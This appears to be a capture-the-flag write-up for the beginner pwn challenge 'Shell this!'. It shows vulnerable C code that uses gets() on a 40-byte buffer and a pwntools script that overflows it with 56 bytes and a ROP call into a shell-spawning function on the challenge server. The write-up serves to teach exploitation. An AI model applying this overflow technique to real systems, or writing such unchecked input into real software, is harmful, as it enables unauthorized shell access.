Rating:

# Shell this!

If you have not already, follow us on Twitter for updates and content! [@RagnarSecurity](https://twitter.com/ragnarsecurity)

This is a beginner level challenge. Since this is a beginner level challenge, I will recommend a couple things to people new to pwn CTF challenges:

- Get gdb-peda
- Get pwntools
- Practice Practice Practice!
- [Learn Here](https://github.com/RPISEC/MBE): This is a crash course of binary exploitation from RPI.

How to solve:

## Step 1 - Be a Reverse Engineer!

We first need to figure out what the program is doing. Luckily we are given source code.

```c
#include <stdio.h>
#include <unistd.h>

__attribute__((constructor))
void setup() {
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
}

void get_shell() {
execve("/bin/sh", NULL, NULL);
}

void vuln() {
char name[40];

printf("Please tell me your name: ");
gets(name);
}

int main(void) {
printf("Welcome! Can you figure out how to get this program to give you a shell?\n");
vuln();
printf("Unfortunately, you did not win. Please try again another time!\n");
}
```

Obviously the exploit is in `vuln`, and it is a buffer overflow. The other interesting thing is we have a get_shell. This means we can create a ret2text exploit.

How to craft our exploit.

- Fill the buffer, NOPS, RBP, and VULN's RET with whatever character you desire.
- Fill main's ret with `get_shell`
- Shell!

```py
from pwn import *

elf = ELF('./shellthis')
p = remote("chal.duc.tf", 30002)

junk = b'A'*56
rop = ROP(elf)
rop.call(elf.symbols['get_shell'])

payload = junk+rop.chain()

p.recvuntil("Please tell me your name: ")
p.sendline(payload)
p.interactive()
```

Original writeup (https://github.com/Ragnar-Security/ctf-writeups/tree/master/downunder-ctf/pwn/shellthis).